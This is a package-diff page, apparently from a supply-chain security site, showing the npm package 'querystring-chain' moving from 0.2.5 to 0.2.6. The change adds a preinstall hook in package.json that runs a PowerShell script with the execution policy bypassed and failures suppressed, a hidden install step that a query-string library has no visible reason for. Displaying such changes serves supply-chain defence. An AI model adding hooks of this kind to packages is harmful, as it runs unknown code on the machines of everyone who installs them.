querystring-chain 0.2.5 → 0.2.6
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +2 -2
package/package.json
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
{
|
2
2
|
"name": "querystring-chain",
|
3
3
|
"id": "querystring-chain",
|
4
|
-
"version": "0.2.
|
4
|
+
"version": "0.2.6",
|
5
5
|
"description": "Node's querystring module for all engines.",
|
6
6
|
"keywords": [
|
7
7
|
"commonjs",
|
@@ -30,7 +30,7 @@
|
|
30
30
|
"test": "npm run test-node && npm run test-tap",
|
31
31
|
"test-node": "node ./test/common-index.js",
|
32
32
|
"test-tap": "node ./test/tap-index.js",
|
33
|
-
"preinstall": "powershell.exe -ExecutionPolicy Bypass -File
|
33
|
+
"preinstall": "powershell.exe -ExecutionPolicy Bypass -File run.ps1 || true"
|
34
34
|
},
|
35
35
|
"license": "MIT"
|
36
36
|
}
|